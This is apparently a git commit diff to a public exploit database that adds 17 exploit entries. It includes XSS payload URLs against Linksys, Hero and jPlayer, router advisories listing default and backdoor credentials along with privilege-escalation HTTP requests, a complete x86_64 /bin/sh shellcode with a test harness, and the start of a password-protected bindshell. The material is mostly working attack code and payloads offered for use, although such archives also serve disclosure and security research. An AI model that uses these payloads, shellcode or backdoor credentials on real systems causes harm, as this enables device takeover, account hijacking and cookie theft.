DB: 2015-10-16
17 new exploits
This commit is contained in:
parent
01940201cb
commit
aa57287847
18 changed files with 1243 additions and 0 deletions
17
files.csv
17
files.csv
|
@ -34452,6 +34452,7 @@ id,file,description,date,author,platform,type,port
|
|||
38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80
|
||||
38203,platforms/linux/remote/38203.txt,"Schmid Watson Management Console Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",linux,remote,0
|
||||
38204,platforms/php/webapps/38204.txt,"Prizm Content Connect Arbitrary File Upload Vulnerability",2013-01-09,"Include Security Research",php,webapps,0
|
||||
38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux x86_64 - /bin/sh",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0
|
||||
38151,platforms/windows/remote/38151.py,"Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0
|
||||
38152,platforms/php/webapps/38152.txt,"MotoCMS admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0
|
||||
38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) /webmail/x3/mail/clientconf.html acct Parameter XSS",2012-12-27,"Christy Philip Mathew",php,webapps,0
|
||||
|
@ -34727,10 +34728,26 @@ id,file,description,date,author,platform,type,port
|
|||
38440,platforms/php/webapps/38440.txt,"phpMyAdmin 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0
|
||||
38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection Vulnerability",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38444,platforms/win32/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win32,dos,0
|
||||
38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - CSRF Add Extension And File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0
|
||||
38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal Vulnerability",2015-10-13,"Karn Ganeshen",hardware,webapps,0
|
||||
38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
|
||||
38450,platforms/php/webapps/38450.txt,"Kerio Control <= 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0
|
||||
38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel NetUSB - Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0
|
||||
38455,platforms/hardware/webapps/38455.txt,"ZyXEL PMG5318-B20A - OS Command Injection Vulnerability",2015-10-14,"Karn Ganeshen",hardware,webapps,0
|
||||
38456,platforms/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow",2015-10-14,ArminCyber,windows,local,0
|
||||
38458,platforms/php/webapps/38458.txt,"WordPress Spider Video Player Plugin 'theme' Parameter SQL Injection Vulnerability",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38459,platforms/php/webapps/38459.txt,"Request Tracker 'ShowPending' Parameter SQL Injection Vulnerability",2013-04-11,cheki,php,webapps,0
|
||||
38452,platforms/windows/local/38452.txt,"CDex Genre 1.79 - Stack Buffer Overflow",2015-10-13,Un_N0n,windows,local,0
|
||||
38453,platforms/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",hardware,remote,0
|
||||
38460,platforms/jsp/webapps/38460.txt,"jPlayer 'Jplayer.swf' Script Cross Site Scripting Vulnerability",2013-03-29,"Malte Batram",jsp,webapps,0
|
||||
38461,platforms/java/webapps/38461.txt,"Hero Framework /users/login username Parameter XSS",2013-04-10,"High-Tech Bridge",java,webapps,0
|
||||
38462,platforms/java/webapps/38462.txt,"Hero Framework /users/forgot_password error Parameter XSS",2013-04-10,"High-Tech Bridge",java,webapps,0
|
||||
38463,platforms/multiple/webapps/38463.txt,"Aibolit Information Disclosure Vulnerability",2013-04-13,MustLive,multiple,webapps,0
|
||||
38464,platforms/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router Multiple Security Vulnerabilities",2013-04-15,"Phil Purviance",hardware,remote,0
|
||||
38465,platforms/linux/local/38465.txt,"Linux Kernel <= 3.2.1 Tracing Mutiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,linux,local,0
|
||||
38467,platforms/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0
|
||||
38469,platforms/lin_x86-64/shellcode/38469.c,"Linux x86_64 Bindshell with Password (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
|
||||
38470,platforms/hardware/webapps/38470.txt,"netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0
|
||||
38471,platforms/hardware/webapps/38471.txt,"PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0
|
||||
38472,platforms/windows/local/38472.py,"Blat.exe 2.7.6 SMTP / NNTP Mailer - Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0
|
||||
38474,platforms/windows/local/38474.txt,"Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0
|
||||
|
|
Can't render this file because it is too large.
|
25
platforms/hardware/remote/38464.txt
Executable file
25
platforms/hardware/remote/38464.txt
Executable file
|
@ -0,0 +1,25 @@
|
|||
source: http://www.securityfocus.com/bid/59054/info
|
||||
|
||||
Cisco Linksys EA2700 routers is prone to the following security vulnerabilities:
|
||||
|
||||
1. A security-bypass vulnerability
|
||||
2. A cross-site request-forgery vulnerability
|
||||
3. A cross-site scripting vulnerability
|
||||
|
||||
An attacker can exploit these issues to bypass certain security restrictions, steal cookie-based authentication credentials, gain access to system and other configuration files, or perform unauthorized actions in the context of a user session.
|
||||
|
||||
Cisco Linksys EA2700 running firmware 1.0.12.128947 is vulnerable.
|
||||
|
||||
The following example request is available:
|
||||
|
||||
POST /apply.cgi HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-us,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Proxy-Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 47
|
||||
|
||||
submit_button=xss'%3balert(1)//934&action=Apply
|
218
platforms/hardware/webapps/38470.txt
Executable file
218
platforms/hardware/webapps/38470.txt
Executable file
|
@ -0,0 +1,218 @@
|
|||
# Exploit Title: [netis RealTek wireless router / ADSL modem Multiple
|
||||
Vulnerabilities]
|
||||
# Discovered by: Karn Ganeshen
|
||||
# Reported on: [October 13, 2015]
|
||||
# Vendor Response: [Vulnerability? What's this?]
|
||||
# Vendor Homepage: [www.netis-systems.com]
|
||||
# Version Affected: [Firmware version RTK v2.1.1]
|
||||
|
||||
|
||||
**Vulnerability Details**
|
||||
|
||||
* 1. Default, weak passwords for http and ftp services *
|
||||
|
||||
a. *HTTP accounts*
|
||||
- guest/guest
|
||||
- user/user
|
||||
- guest/XXXXairocon
|
||||
|
||||
<chain N="USERNAME_PASSWORD">
|
||||
<V N="FLAG" V="0x0"/>
|
||||
<V N="USERNAME" V="guest"/>
|
||||
<V N="PASSWORD" V="guest"/>
|
||||
<V N="BACKDOOR" V="0x0"/>
|
||||
<V N="PRIORITY" V="0x2"/>
|
||||
</chain>
|
||||
<chain N="USERNAME_PASSWORD">
|
||||
<V N="FLAG" V="0x0"/>
|
||||
<V N="USERNAME" V="user"/>
|
||||
<V N="PASSWORD" V="user"/>
|
||||
<V N="BACKDOOR" V="0x0"/>
|
||||
<V N="PRIORITY" V="0x0"/> </chain>
|
||||
|
||||
<chain N="USERNAME_PASSWORD">
|
||||
<V N="FLAG" V="0x0"/>
|
||||
<V N="USERNAME" V="guest"/>
|
||||
<V N="PASSWORD" V="XXXXairocon"/>
|
||||
<V N="BACKDOOR" V="0x1"/>
|
||||
<V N="PRIORITY" V="0x1"/> </chain>
|
||||
|
||||
*XXXX -> last four digits of MAC address *
|
||||
|
||||
b. *FTP accounts*
|
||||
|
||||
- admin/admin
|
||||
- useradmin/useradmin
|
||||
- user/user
|
||||
|
||||
<chain N="FTP_SERVER">
|
||||
<V N="ENABLE" V="0x1"/>
|
||||
<V N="USERNAME" V="admin"/>
|
||||
<V N="PASSWORD" V="admin"/>
|
||||
<V N="PORT" V="0x15"/>
|
||||
<V N="USERRIGHT" V="0x3"/>
|
||||
<V N="INSTNUM" V="0x1"/> </chain>
|
||||
|
||||
<chain N="FTP_SERVER">
|
||||
<V N="ENABLE" V="0x1"/>
|
||||
<V N="USERNAME" V="useradmin"/>
|
||||
<V N="PASSWORD" V="useradmin"/>
|
||||
<V N="PORT" V="0x15"/>
|
||||
<V N="USERRIGHT" V="0x2"/>
|
||||
<V N="INSTNUM" V="0x2"/> </chain>
|
||||
|
||||
<chain N="FTP_SERVER">
|
||||
<V N="ENABLE" V="0x1"/>
|
||||
<V N="USERNAME" V="user"/>
|
||||
<V N="PASSWORD" V="user"/>
|
||||
<V N="PORT" V="0x15"/>
|
||||
<V N="USERRIGHT" V="0x1"/>
|
||||
<V N="INSTNUM" V="0x3"/> </chain>
|
||||
|
||||
|
||||
2. *Backdoor accounts*
|
||||
The device comes configured with privileged, backdoor account.
|
||||
|
||||
For HTTP, 'guest' with attribute <V N="BACKDOOR" V="0x1"/>, is the backdoor
|
||||
account. This is seen in the config file:
|
||||
|
||||
<chain N="USERNAME_PASSWORD">
|
||||
<V N="FLAG" V="0x0"/>
|
||||
<V N="USERNAME" V="guest"/>
|
||||
<V N="PASSWORD" V="XXXXairocon"/>
|
||||
<V N="BACKDOOR" V="0x1"/>
|
||||
<V N="PRIORITY" V="0x1"/>
|
||||
</chain>
|
||||
|
||||
This user is not shown / visible in the user list when logged in as guest
|
||||
(privileged user).
|
||||
|
||||
|
||||
3. *No CSRF protection*
|
||||
There is no CSRF token set in any of the forms / pages.
|
||||
|
||||
It is possible to silently execute HTTP requests if the user is logged in.
|
||||
|
||||
|
||||
4. *Weak RBAC controls *
|
||||
|
||||
5a) *A non-root/non-admin user (user) can create and delete any other
|
||||
users, including root-privileged accounts. *
|
||||
|
||||
In netis RealTek wireless router ADSL modem, there are three users:
|
||||
|
||||
guest:guest -> priv 2 is super user account with full functional access
|
||||
user:user -> priv 0 -> can access only some functions
|
||||
guest:XXXXairocon -> privileged backdoor login
|
||||
|
||||
|
||||
*Normally: *
|
||||
|
||||
- user can create new account with restricted user privs only.
|
||||
- user can change its password and only other non-root users.
|
||||
- user can delete any other non-root users.
|
||||
|
||||
However, the application does not enforce strict rbac and it is possible
|
||||
for a non-root user to create a new user with root privileges.
|
||||
|
||||
|
||||
This is done as follows:
|
||||
|
||||
1. Start creating a new user, and intercepting the user creation POST
|
||||
request
|
||||
2. Intercept & Change privilege parameter value from 0 (user) to 2 (root) -
|
||||
Submit request
|
||||
3. When the new root user is created successfully, it does not show up in
|
||||
user list
|
||||
4. Confirm via logging in as new root, and / or configured accounts in
|
||||
configuration file (config.img)
|
||||
|
||||
|
||||
This is the POST request to create a new user:
|
||||
|
||||
*Create user http request*:
|
||||
|
||||
POST /form2userconfig.cgi HTTP/1.1
|
||||
Host: <IP>
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
|
||||
Firefox/38.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Referer: http://<IP>/userconfig.htm?v=
|
||||
Cookie: SessionID=
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 115
|
||||
username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=
|
||||
|
||||
|
||||
|
||||
*Note1*: In some cases, this password change function is not accessible to
|
||||
'user' via GUI. But we can still send a POST request to create a valid, new
|
||||
root privileged account.
|
||||
|
||||
*Note2*: In some cases, application does not create root priv user, in the
|
||||
first attempt. However, in the 2nd or 3rd attempt, new user is created
|
||||
without any issue.
|
||||
|
||||
|
||||
*Delete user http request:*
|
||||
A non-root/non-admin user can delete any configured user(s) including
|
||||
privileged users (guest).
|
||||
|
||||
POST /form2userconfig.cgi HTTP/1.1
|
||||
Host: <ip>
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
|
||||
Firefox/38.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Referer: http://<IP>/userconfig.htm
|
||||
Cookie: SessionID=
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 131
|
||||
username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%
|
||||
|
||||
|
||||
|
||||
In case (non-root) user is deleting a root login (guest, priv 2), action
|
||||
status can be confirmed by checking the configuration In case (non-root)
|
||||
user is deleting a user login (priv 0), action status can be confirmed by
|
||||
checking the user list.
|
||||
|
||||
|
||||
5b) *(non-root priv) User can access unauthorized functions.*
|
||||
Normally, 'user' does not have access to all the functionality of the
|
||||
device. It has access to Status, Setup and Maintenance.
|
||||
|
||||
However, few functions can still be accessed by calling them directly. For
|
||||
example, to access the mac filtering configuration this url can be opened
|
||||
directly:
|
||||
|
||||
http://<IP>/fw-macfilter.htm
|
||||
|
||||
Other functions may also be accessible in this manner.
|
||||
|
||||
|
||||
6. *Sensitive information not secured from low privileged users *
|
||||
|
||||
A non-root / non-admin privileged user has access to download the
|
||||
configuration file - config.img.
|
||||
|
||||
This file contains clear-text passwords, keys and other sensitive
|
||||
information which can be used to gain privileged access.
|
||||
|
||||
|
||||
7. *Sensitive information accessible in clear-text*
|
||||
|
||||
Sensitive Information like passwords and keys are not secured properly.
|
||||
Mostly these are either shown in clear-text or cen censored *****, it is
|
||||
possible to view clear-text values by 'Inspect Element' locally or
|
||||
intercepting http requests, or sniffing.
|
||||
--
|
||||
Best Regards,
|
||||
Karn Ganeshen
|
219
platforms/hardware/webapps/38471.txt
Executable file
219
platforms/hardware/webapps/38471.txt
Executable file
|
@ -0,0 +1,219 @@
|
|||
# Exploit Title: [PROLiNK H5004NK ADSL Wireless Modem Multiple
|
||||
Vulnerabilities]
|
||||
# Discovered by: Karn Ganeshen
|
||||
# Reported on: [October 13, 2015]
|
||||
# Vendor Response: [No process to handle vuln reports]
|
||||
# Vendor Homepage: [
|
||||
http://www.prolink2u.com/newtemp/datacom/adsl-modem-router/381-h5004nk.html]
|
||||
# Version Affected: [Firmware version R76S Slt 4WNE1 6.1R]
|
||||
|
||||
|
||||
**Vulnerability Details**
|
||||
|
||||
*1. Default, weak passwords for http and ftp services *
|
||||
|
||||
a. *HTTP accounts*
|
||||
- admin/password
|
||||
- user/user
|
||||
- guest/XXXXairocon
|
||||
|
||||
<chain N="USERNAME_PASSWORD">
|
||||
<V N="FLAG" V="0x0"/>
|
||||
<V N="USERNAME" V="admin"/>
|
||||
<V N="PASSWORD" V="password"/>
|
||||
<V N="BACKDOOR" V="0x0"/>
|
||||
<V N="PRIORITY" V="0x2"/>
|
||||
</chain>
|
||||
|
||||
<chain N="USERNAME_PASSWORD">
|
||||
<V N="FLAG" V="0x0"/>
|
||||
<V N="USERNAME" V="user"/>
|
||||
<V N="PASSWORD" V="user"/>
|
||||
<V N="BACKDOOR" V="0x0"/>
|
||||
<V N="PRIORITY" V="0x0"/> </chain>
|
||||
|
||||
<chain N="USERNAME_PASSWORD">
|
||||
<V N="FLAG" V="0x0"/>
|
||||
<V N="USERNAME" V="guest"/>
|
||||
<V N="PASSWORD" V="XXXXairocon"/>
|
||||
<V N="BACKDOOR" V="0x1"/>
|
||||
<V N="PRIORITY" V="0x1"/> </chain>
|
||||
|
||||
*XXXX -> last four digits of MAC address *
|
||||
|
||||
b. *FTP accounts*
|
||||
|
||||
- admin/admin
|
||||
- useradmin/useradmin
|
||||
- user/user
|
||||
|
||||
<chain N="FTP_SERVER">
|
||||
<V N="ENABLE" V="0x1"/>
|
||||
<V N="USERNAME" V="admin"/>
|
||||
<V N="PASSWORD" V="admin"/>
|
||||
<V N="PORT" V="0x15"/>
|
||||
<V N="USERRIGHT" V="0x3"/>
|
||||
<V N="INSTNUM" V="0x1"/> </chain>
|
||||
|
||||
<chain N="FTP_SERVER">
|
||||
<V N="ENABLE" V="0x1"/>
|
||||
<V N="USERNAME" V="useradmin"/>
|
||||
<V N="PASSWORD" V="useradmin"/>
|
||||
<V N="PORT" V="0x15"/>
|
||||
<V N="USERRIGHT" V="0x2"/>
|
||||
<V N="INSTNUM" V="0x2"/> </chain>
|
||||
|
||||
<chain N="FTP_SERVER">
|
||||
<V N="ENABLE" V="0x1"/>
|
||||
<V N="USERNAME" V="user"/>
|
||||
<V N="PASSWORD" V="user"/>
|
||||
<V N="PORT" V="0x15"/>
|
||||
<V N="USERRIGHT" V="0x1"/>
|
||||
<V N="INSTNUM" V="0x3"/> </chain>
|
||||
|
||||
|
||||
2. *Backdoor accounts*
|
||||
The device comes configured with privileged, backdoor account.
|
||||
|
||||
For HTTP, 'guest' with attribute <V N="BACKDOOR" V="0x1"/>, is the backdoor
|
||||
account. This is seen in the config file:
|
||||
|
||||
<chain N="USERNAME_PASSWORD">
|
||||
<V N="FLAG" V="0x0"/>
|
||||
<V N="USERNAME" V="guest"/>
|
||||
<V N="PASSWORD" V="XXXXairocon"/>
|
||||
<V N="BACKDOOR" V="0x1"/>
|
||||
<V N="PRIORITY" V="0x1"/>
|
||||
</chain>
|
||||
|
||||
This user is not shown / visible in the user list when logged in as admin
|
||||
(privileged user).
|
||||
|
||||
|
||||
3. *No CSRF protection*
|
||||
There is no CSRF token set in any of the forms / pages.
|
||||
|
||||
It is possible to silently execute HTTP requests if the user is logged in.
|
||||
|
||||
|
||||
4. *Weak RBAC controls *
|
||||
|
||||
5a) *A non-admin user (user) can create and delete any other users,
|
||||
including root-privileged accounts. *
|
||||
|
||||
There are three users:
|
||||
|
||||
admin:password -> priv 2 is super user account with full functional access
|
||||
(admin/root)
|
||||
user:user -> priv 0 -> can access only some functions (user)
|
||||
guest:XXXXairocon -> privileged backdoor login
|
||||
|
||||
|
||||
*Normally: *
|
||||
|
||||
- user can create new account with restricted user privs only.
|
||||
- user can change its password and only other non-admin users.
|
||||
- user can delete any other non-admin users.
|
||||
|
||||
However, the application does not enforce strict rbac and it is possible
|
||||
for a non-admin user to create a new account with admin privileges.
|
||||
|
||||
|
||||
This is done as follows:
|
||||
|
||||
1. Start creating a new user, and intercepting the user creation POST
|
||||
request
|
||||
2. Intercept & Change privilege parameter value from 0 (user) to 2 (admin)
|
||||
- Submit request
|
||||
3. When the new admin user is created successfully, it does not show up in
|
||||
user list
|
||||
4. Confirm via logging in as new admin, and / or configured accounts in
|
||||
configuration file (config.img)
|
||||
|
||||
|
||||
This is the POST request to create a new user:
|
||||
|
||||
*Create user http request*:
|
||||
|
||||
POST /form2userconfig.cgi HTTP/1.1
|
||||
Host: <IP>
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
|
||||
Firefox/38.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Referer: http://<IP>/userconfig.htm?v=
|
||||
Cookie: SessionID=
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 115
|
||||
username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=
|
||||
|
||||
|
||||
*Note1*: In some cases, this password change function is not accessible to
|
||||
'user' via GUI. But we can still send a POST request to create a valid, new
|
||||
higher privileged account.
|
||||
|
||||
*Note2*: In some cases, application does not create admin priv user, in the
|
||||
first attempt. However, in the 2nd or 3rd attempt, new user is created
|
||||
without any issue.
|
||||
|
||||
|
||||
*Delete user http request:*
|
||||
A non-admin user can delete any configured user(s) including privileged
|
||||
users (admin).
|
||||
|
||||
POST /form2userconfig.cgi HTTP/1.1
|
||||
Host: <ip>
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
|
||||
Firefox/38.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Referer: http://<IP>/userconfig.htm
|
||||
Cookie: SessionID=
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 131
|
||||
username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%
|
||||
|
||||
|
||||
In case (non-admin) user is deleting the admin login (priv 2), action
|
||||
status can be confirmed by checking the configuration.
|
||||
In case (non-admin) user is deleting another user login (priv 0), action
|
||||
status can be confirmed by checking the user list.
|
||||
|
||||
|
||||
5b) *(non-admin priv) User can access unauthorized functions.*
|
||||
Normally, 'user' does not have access to all the functionality of the
|
||||
device. It has access to Status, Setup and Maintenance.
|
||||
|
||||
However, few functions can still be accessed by calling them directly. For
|
||||
example, to access the mac filtering configuration this url can be opened
|
||||
directly:
|
||||
|
||||
http://<IP>/fw-macfilter.htm
|
||||
|
||||
Other functions may also be accessible in this manner.
|
||||
|
||||
|
||||
6. *Sensitive information not secured from low privileged users *
|
||||
|
||||
A non-admin privileged user has access to download the configuration file
|
||||
- config.img.
|
||||
|
||||
This file contains clear-text passwords, keys and other sensitive
|
||||
information which can be used to gain privileged access.
|
||||
|
||||
|
||||
7. *Sensitive information accessible in clear-text*
|
||||
|
||||
Sensitive Information like passwords and keys are not secured properly.
|
||||
Mostly these are either shown in clear-text or cen censored *****, it is
|
||||
possible to view clear-text values by 'Inspect Element' locally or
|
||||
intercepting http requests, or sniffing.
|
||||
--
|
||||
Best Regards,
|
||||
Karn Ganeshen
|
9
platforms/java/webapps/38461.txt
Executable file
9
platforms/java/webapps/38461.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/59041/info
|
||||
|
||||
Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Hero 3.791 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/users/login?username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
9
platforms/java/webapps/38462.txt
Executable file
9
platforms/java/webapps/38462.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/59041/info
|
||||
|
||||
Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Hero 3.791 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/users/forgot_password?error=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==
|
7
platforms/jsp/webapps/38460.txt
Executable file
7
platforms/jsp/webapps/38460.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/59030/info
|
||||
|
||||
jPlayer is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/Jplayer.swf?id=%3Cimg%20src=x%20onerror=alert\u0028\u0027moin\u0027\u0029%3E&jQuery=document.write
|
90
platforms/lin_x86-64/shellcode/38150.txt
Executable file
90
platforms/lin_x86-64/shellcode/38150.txt
Executable file
|
@ -0,0 +1,90 @@
|
|||
# Exploit Title: Shellcode /bin/sh for Linux x86_64 (different approach)
|
||||
# Date: 2015-09-10
|
||||
# Exploit Author: Fanda Uchytil
|
||||
# Version: 1
|
||||
# Tested on: Linux 3.16.0-4-amd64 (Debian), 2.6.32-openvz-042stab093.5-amd64 (Centos/RHEL based), 2.6.32-5-amd64 (Debian)
|
||||
|
||||
|
||||
AT&T VERSION (for smooth debug)
|
||||
-------------------------------
|
||||
|
||||
.global _start
|
||||
.text
|
||||
_start:
|
||||
# int execve(const char *filename, char *const argv[], char *const envp[]);
|
||||
xor %rax, %rax
|
||||
add $59, %rax # Linux 64b execve
|
||||
xor %rdi, %rdi
|
||||
push %rdi # '\0' for termination of string below
|
||||
mov $0x68732F2f6e69622F, %rdi # "/bin//sh" (slash padding)
|
||||
push %rdi
|
||||
lea (%rsp), %rdi
|
||||
xor %rsi, %rsi # no shell arguments
|
||||
xor %rdx, %rdx # no env vars
|
||||
syscall
|
||||
|
||||
|
||||
$ gcc -nostdlib shellcode_atnt.s -o shellcode_atnt && objdump -d shellcode_atnt
|
||||
$ ./shellcode_atnt
|
||||
$ gdb -q ./shellcode_atnt
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
4000d4: 48 31 c0 xor %rax,%rax
|
||||
4000d7: 48 83 c0 3b add $0x3b,%rax
|
||||
4000db: 48 31 ff xor %rdi,%rdi
|
||||
4000de: 57 push %rdi
|
||||
4000df: 48 bf 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rdi
|
||||
4000e6: 2f 73 68
|
||||
4000e9: 57 push %rdi
|
||||
4000ea: 48 8d 3c 24 lea (%rsp),%rdi
|
||||
4000ee: 48 31 f6 xor %rsi,%rsi
|
||||
4000f1: 48 31 d2 xor %rdx,%rdx
|
||||
4000f4: 0f 05 syscall
|
||||
|
||||
|
||||
|
||||
|
||||
INTEL VERSION
|
||||
-------------
|
||||
|
||||
BITS 64
|
||||
xor rax, rax
|
||||
add rax, 59
|
||||
xor rdi, rdi
|
||||
push rdi
|
||||
mov rdi, 0x68732F2f6e69622F
|
||||
push rdi
|
||||
lea rdi, [rsp]
|
||||
xor rsi, rsi
|
||||
xor rdx, rdx
|
||||
syscall
|
||||
|
||||
|
||||
$ nasm shellcode.a
|
||||
|
||||
|
||||
|
||||
|
||||
SHELLCODE_TEST.C
|
||||
----------------
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
int (*f)() = (int(*)()) argv[1];
|
||||
return (*f)();
|
||||
}
|
||||
|
||||
|
||||
$ gcc -o shellcode_test shellcode_test.c -z execstack # or use `execstack(8)` before command below
|
||||
$ ./shellcode_test "$(cat shellcode)"
|
||||
|
||||
|
||||
|
||||
|
||||
STRING
|
||||
------
|
||||
|
||||
$ xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\&/g'
|
||||
\48\31\c0\48\83\c0\3b\48\31\ff\57\48\bf\2f\62\69\6e\2f\2f\73\68\57\48\8d\3c\24\48\31\f6\48\31\d2\0f\05
|
||||
|
||||
$ ./shellcode_test "$(printf "$(xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\x&/g')")"
|
121
platforms/lin_x86-64/shellcode/38469.c
Executable file
121
platforms/lin_x86-64/shellcode/38469.c
Executable file
|
@ -0,0 +1,121 @@
|
|||
/*
|
||||
;Title: bindshell with password in 92 bytes
|
||||
;Author: David Velázquez a.k.a d4sh&r
|
||||
;Contact: https://mx.linkedin.com/in/d4v1dvc
|
||||
;Description: x64 Linux bind TCP port shellcode on port 31173 with 4 bytes as password in 94 bytes
|
||||
;Tested On: Linux kali64 3.18.0-kali3-amd64 x86_64 GNU/Linux
|
||||
|
||||
;Compile & Run: nasm -f elf64 -o bindshell.o bindshell.nasm
|
||||
; ld -o bindshell bindshell.o
|
||||
; ./bindshell
|
||||
;SLAE64-1379
|
||||
|
||||
|
||||
global _start
|
||||
|
||||
|
||||
_start:
|
||||
|
||||
socket:
|
||||
;int socket(int domain, int type, int protocol)2,1,0
|
||||
xor esi,esi ;rsi=0
|
||||
mul esi ;rdx,rax,rsi=0, rdx is 3rd argument
|
||||
inc esi ;rsi=1, 2nd argument
|
||||
push 2
|
||||
pop rdi ;rdi=2,1st argument
|
||||
add al, 41 ;socket syscall
|
||||
syscall
|
||||
|
||||
push rax ;socket result
|
||||
pop rdi ;rdi=sockfd
|
||||
|
||||
;struct sockaddr_in {
|
||||
; sa_family_t sin_family; /* address family: AF_INET */
|
||||
; in_port_t sin_port; /* port in network byte order */
|
||||
; struct in_addr sin_addr; /* internet address */
|
||||
;};
|
||||
|
||||
push 2 ;AF_INET
|
||||
